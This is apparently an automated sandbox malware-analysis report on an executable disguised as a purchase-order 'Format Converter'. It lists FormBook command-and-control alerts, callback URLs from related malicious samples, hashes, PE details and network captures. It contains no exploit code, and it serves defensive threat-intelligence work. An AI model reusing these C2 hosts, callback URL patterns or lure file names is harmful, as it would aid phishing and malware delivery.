                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  13:35:10API Interceptor1x Sleep call for process: NEW ORDER ELO-05756485.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  198.185.159.144PO45937008ADENGY.exeGet hashmaliciousBrowse
                                                  • www.theskineditco.com/mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl
                                                  LWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                  • www.anadelalastra.art/sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV
                                                  RCS76393.exeGet hashmaliciousBrowse
                                                  • www.pimpmyrecipe.com/goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz
                                                  PO4308.exeGet hashmaliciousBrowse
                                                  • www.alchemistslibrary.com/pnqr/?X2JtjTX8=z9nKZcvAPWzUQhY9y3T5XVIzOkQhxhUtd7CKHZyMoghVgOSKx+Fjs7sJEQh08Ts7gk8yJD62ag==&bl=TVItEdNXpFHh
                                                  TazxfJHRhq.exeGet hashmaliciousBrowse
                                                  • www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu
                                                  Order Inquiry.exeGet hashmaliciousBrowse
                                                  • www.getgenevieved.com/r4ei/?9rQl2=wFNtQXbP&t6Ad=lOfuxtPF4il1Jf5EERhirk3Wdt+b9SUzBWaFyElm1rRKZL2x7wuCbVuufCM8qdhuJ86n
                                                  TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                  • www.cindybelardo.com/qqeq/?oX=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr976CPGLkKL8&sBZ8qr=Fxl8FxGPjJo8-
                                                  New Order.exeGet hashmaliciousBrowse
                                                  • www.radiorejekts.com/gwam/?Iry=ONtj9W7nV9ZGpEHVJNfDlWrNbkpYgiFClGnoUoEoQiKZyCXOLwMg6K6LKjWWFncBTlNA&ob30vr=S0Glx8
                                                  SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                  • www.cindybelardo.com/qqeq/?UR-TRLn=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr+bASemz+tq7&P6u=Hb9l0TTXQ4NLhX
                                                  New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                                                  • www.xomonroe.com/evh4/?vR-lx=mUKuFt7Jt/u71c4PSt38ziCZS3BUg2e8LD2S6eZiZC4IumnTujc05pOAm4tUdXdaGNCmokkeSA==&E8LHll=jfIX5LDxkxdhJTgP
                                                  New Month.exeGet hashmaliciousBrowse
                                                  • www.ussouthernhome.com/nppk/?kfIXa4=PcNj3q/CMcdvPYJC9A1ueSg5wRTqWaK9K+KWTMGfE5xIowphBNT+eHYPWkjoOWig7+Qi&XP0=ybFLQT2H0FsXBx
                                                  QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                  • www.markrobersticker.com/aun3/?YrIHdvPX=r/YBW9ssF3S+2poRG61gcf3j1YCgKIjwgQz6XW4ODbs5DL3PWKC9kUAY5ABsTG3sD74i&Dzut_N=3fm0
                                                  new built.exeGet hashmaliciousBrowse
                                                  • www.amymako.com/klf/?TlX=YvLT&t8o=YIBPr2PP4TUydPzAxpqYzoT8Fd3d4uq1lz450j/EP32B3j2OHU2eBgUME3q0XrkiC9k9
                                                  Invoice.xlsxGet hashmaliciousBrowse
                                                  • www.aratssycosmetics.com/iu4d/?L2JH=uKRUrjhLA6aGoerdjROgrXpkE9A34BbuVfDDyYeArPtVUwLJNjfP2xipo2Au/YQGKskRiw==&0n=fxlp
                                                  MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                  • www.egofickle.com/rrrq/?0R-LTpD=fIBAwtBUc2AtuFdzEcCTdBR4iqwx1dALhor1r45uJJNE7oTAKP6XpVhMc7NBwxyLLq7z&uDKlwt=XPiPwvlxrzD
                                                  Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                  • www.anadelalastra.art/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ
                                                  SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                  • www.238olive.com/klf/?2d8=rhE1aKYrK3koE+pmz9VaVxftp+vdw8+avUxfPqYILSGoF3JOgjBtvswgsokuHBHrC7nI&Lxl=BRg8bD
                                                  invoice bank.xlsxGet hashmaliciousBrowse
                                                  • www.susanlevinedesign.com/aqu2/?_nO8YBS=OFrxr2AG5sLOiC43MRnhB8o53CAdFk4SvtI8ZSN28mbVlFBwADBBAWKkltJEya8/hH0wnw==&bxop=FZm0mNKHSv9Pklc
                                                  Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                  • www.anewdistraction.com/p2io/?n8Ehjz3=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&JtxH=XPs0s4JPf
                                                  Y79FTQtEqG.exeGet hashmaliciousBrowse
                                                  • www.susanlevinedesign.com/aqu2/?8pdLW0th=OFrxr2AD5rLKiS07ORnhB8o53CAdFk4SvtQsFRR34GbUl0t2HTQNWSymmIl4p6IMuGhA&axo=tVBlCVNXaRgL

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  ext-cust.squarespace.comRCS76393.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  PO4308.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  PO#41000055885.exeGet hashmaliciousBrowse
                                                  • 198.49.23.144
                                                  SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  invoice bank.xlsxGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Y79FTQtEqG.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  UAE MINISTRY OF HEALTH MEDICAL EQUIPMENT SUPPLY TENDER.exeGet hashmaliciousBrowse
                                                  • 198.49.23.144
                                                  Scan copy 24032021_jpeg.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  PO032321.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Copia De Pago_pdf.exeGet hashmaliciousBrowse
                                                  • 198.49.23.145
                                                  V90Y4n0acH.exeGet hashmaliciousBrowse
                                                  • 198.185.159.145
                                                  Dgm2Yseey2.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  winlog.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  payment slip_pdf.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  wFzMy6hehS.exeGet hashmaliciousBrowse
                                                  • 198.49.23.145
                                                  INCHAP_Invoice_21.xlsxGet hashmaliciousBrowse
                                                  • 198.49.23.145
                                                  ffOWE185KP.exeGet hashmaliciousBrowse
                                                  • 198.49.23.145
                                                  q9xB9DE3RA.exeGet hashmaliciousBrowse
                                                  • 198.49.23.144
                                                  NdxPGuzTB9.exeGet hashmaliciousBrowse
                                                  • 198.185.159.145
                                                  pfjgWtj6ms.exeGet hashmaliciousBrowse
                                                  • 198.49.23.144

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  LEASEWEB-USA-SEA-10USOC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                  • 23.82.230.186
                                                  order samples 056-059_pdf.exeGet hashmaliciousBrowse
                                                  • 23.82.225.149
                                                  order samples 056-062 _pdf.exeGet hashmaliciousBrowse
                                                  • 23.82.225.149
                                                  OPSzlwylj5.exeGet hashmaliciousBrowse
                                                  • 173.234.15.207
                                                  BSG_ptf.exeGet hashmaliciousBrowse
                                                  • 23.82.225.149
                                                  FeDex Shipment Confirmation.exeGet hashmaliciousBrowse
                                                  • 23.82.229.136
                                                  FeDex Shipment Confirmation.exeGet hashmaliciousBrowse
                                                  • 23.82.229.136
                                                  yqfUONVqpk.exeGet hashmaliciousBrowse
                                                  • 173.234.15.207
                                                  sntU1XoQa3.exeGet hashmaliciousBrowse
                                                  • 173.234.15.207
                                                  vvUkaRlJUJ.exeGet hashmaliciousBrowse
                                                  • 173.234.15.207
                                                  ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                  • 23.82.78.4
                                                  hkcmd.exeGet hashmaliciousBrowse
                                                  • 173.234.15.207
                                                  sample catalog_copy.exeGet hashmaliciousBrowse
                                                  • 23.82.225.149
                                                  cobalt.exeGet hashmaliciousBrowse
                                                  • 23.106.223.79
                                                  SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                                  • 23.108.247.34
                                                  Qs6ySVV95N.exeGet hashmaliciousBrowse
                                                  • 173.234.15.207
                                                  9gVzvJI8zq.exeGet hashmaliciousBrowse
                                                  • 173.234.15.207
                                                  ugGgUEbqio.exeGet hashmaliciousBrowse
                                                  • 173.234.15.207
                                                  3v3Aosgyxw.exeGet hashmaliciousBrowse
                                                  • 173.234.15.207
                                                  Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                                                  • 173.234.14.196
                                                  SQUARESPACEUSPO45937008ADENGY.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  LWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  RCS76393.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  PO4308.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  TazxfJHRhq.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Order Inquiry.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  PO#41000055885.exeGet hashmaliciousBrowse
                                                  • 198.49.23.144
                                                  TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  New Order.exeGet hashmaliciousBrowse
                                                  • 198.49.23.144
                                                  New Order.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                  • 198.49.23.145
                                                  New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  New Month.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  new built.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Invoice.xlsxGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW ORDER ELO-05756485.exe.log
                                                  Process:C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1314
                                                  Entropy (8bit):5.350128552078965
                                                  Encrypted:false
                                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.841039715208465
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:NEW ORDER ELO-05756485.exe
                                                  File size:541184
                                                  MD5:ef847f9fc2339b9470150fef1105b5fe
                                                  SHA1:eb9b2c97525c2b167d1ae4bdeba308f1c4d9206d
                                                  SHA256:9e54241184e45b1950037313896e0d2e864cc9d373f5a2f14b0af405094fd1a4
                                                  SHA512:ea26bb55d9d79ca887b184b71746328e65b06b24d701d7856f6f416a1fc93f750580b68a8204b30eb94dabc9e899e4baf4358f23ef5ce7ea23308369b5be4c10
                                                  SSDEEP:12288:YZtUvOKS/rwbZTeIvmnQI4KBDKmQ98NTum7RUYxSJI:YfPKSErmnj4KtKm28NTbBxS
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#n`..............P..6...........U... ...`....@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:00828e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x485506
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x606E23C1 [Wed Apr 7 21:27:29 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x854b40x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x860000x634.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x8350c0x83600False0.903436459324data7.8543293857IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x860000x6340x800False0.34130859375data3.48761423925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x880000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_VERSION0x860900x3a4data
                                                  RT_MANIFEST0x864440x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightCopyright 2018
                                                  Assembly Version1.0.0.0
                                                  InternalNamePackingSize.exe
                                                  FileVersion1.0.0.0
                                                  CompanyNameBobbleSoft
                                                  LegalTrademarks
                                                  CommentsConverts one textual format to another.
                                                  ProductNameFormat Converter
                                                  ProductVersion1.0.0.0
                                                  FileDescriptionFormat Converter
                                                  OriginalFilenamePackingSize.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  04/08/21-13:36:42.935849TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.623.82.149.10
                                                  04/08/21-13:36:42.935849TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.623.82.149.10
                                                  04/08/21-13:36:42.935849TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.623.82.149.10
                                                  04/08/21-13:37:03.521747TCP1201ATTACK-RESPONSES 403 Forbidden804975334.102.136.180192.168.2.6

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 8, 2021 13:36:21.964540958 CEST4974680192.168.2.6198.185.159.144
                                                  Apr 8, 2021 13:36:22.103595018 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.103813887 CEST4974680192.168.2.6198.185.159.144
                                                  Apr 8, 2021 13:36:22.104038000 CEST4974680192.168.2.6198.185.159.144
                                                  Apr 8, 2021 13:36:22.241715908 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.279726982 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.279777050 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.279795885 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.279807091 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.279820919 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.279856920 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.279884100 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.279902935 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.279921055 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.279938936 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.280170918 CEST4974680192.168.2.6198.185.159.144
                                                  Apr 8, 2021 13:36:22.280210972 CEST4974680192.168.2.6198.185.159.144
                                                  Apr 8, 2021 13:36:22.280322075 CEST4974680192.168.2.6198.185.159.144
                                                  Apr 8, 2021 13:36:22.418211937 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.418282032 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.418311119 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.418337107 CEST8049746198.185.159.144192.168.2.6
                                                  Apr 8, 2021 13:36:22.418466091 CEST4974680192.168.2.6198.185.159.144
                                                  Apr 8, 2021 13:36:22.418545961 CEST4974680192.168.2.6198.185.159.144
                                                  Apr 8, 2021 13:36:42.772279978 CEST4975280192.168.2.623.82.149.10
                                                  Apr 8, 2021 13:36:42.935544968 CEST804975223.82.149.10192.168.2.6
                                                  Apr 8, 2021 13:36:42.935695887 CEST4975280192.168.2.623.82.149.10
                                                  Apr 8, 2021 13:36:42.935848951 CEST4975280192.168.2.623.82.149.10
                                                  Apr 8, 2021 13:36:43.099282980 CEST804975223.82.149.10192.168.2.6
                                                  Apr 8, 2021 13:36:43.108424902 CEST804975223.82.149.10192.168.2.6
                                                  Apr 8, 2021 13:36:43.108454943 CEST804975223.82.149.10192.168.2.6
                                                  Apr 8, 2021 13:36:43.108700991 CEST4975280192.168.2.623.82.149.10
                                                  Apr 8, 2021 13:36:43.108828068 CEST4975280192.168.2.623.82.149.10
                                                  Apr 8, 2021 13:36:43.272010088 CEST804975223.82.149.10192.168.2.6
                                                  Apr 8, 2021 13:37:03.328736067 CEST4975380192.168.2.634.102.136.180
                                                  Apr 8, 2021 13:37:03.341348886 CEST804975334.102.136.180192.168.2.6
                                                  Apr 8, 2021 13:37:03.341512918 CEST4975380192.168.2.634.102.136.180
                                                  Apr 8, 2021 13:37:03.341767073 CEST4975380192.168.2.634.102.136.180
                                                  Apr 8, 2021 13:37:03.353975058 CEST804975334.102.136.180192.168.2.6
                                                  Apr 8, 2021 13:37:03.521747112 CEST804975334.102.136.180192.168.2.6
                                                  Apr 8, 2021 13:37:03.521774054 CEST804975334.102.136.180192.168.2.6
                                                  Apr 8, 2021 13:37:03.522075891 CEST4975380192.168.2.634.102.136.180
                                                  Apr 8, 2021 13:37:03.522181034 CEST4975380192.168.2.634.102.136.180
                                                  Apr 8, 2021 13:37:03.535173893 CEST804975334.102.136.180192.168.2.6

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 8, 2021 13:34:55.055859089 CEST6034253192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:34:55.069240093 CEST53603428.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:34:55.770667076 CEST6134653192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:34:55.784821033 CEST53613468.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:34:56.447710037 CEST5177453192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:34:56.459870100 CEST53517748.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:01.446291924 CEST5602353192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:01.458870888 CEST53560238.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:03.370265007 CEST5838453192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:03.385015965 CEST53583848.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:04.991823912 CEST6026153192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:05.003837109 CEST53602618.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:06.922836065 CEST5606153192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:06.934811115 CEST53560618.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:07.664693117 CEST5833653192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:07.678008080 CEST53583368.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:08.644856930 CEST5378153192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:08.658363104 CEST53537818.8.8.8192.168.2.6
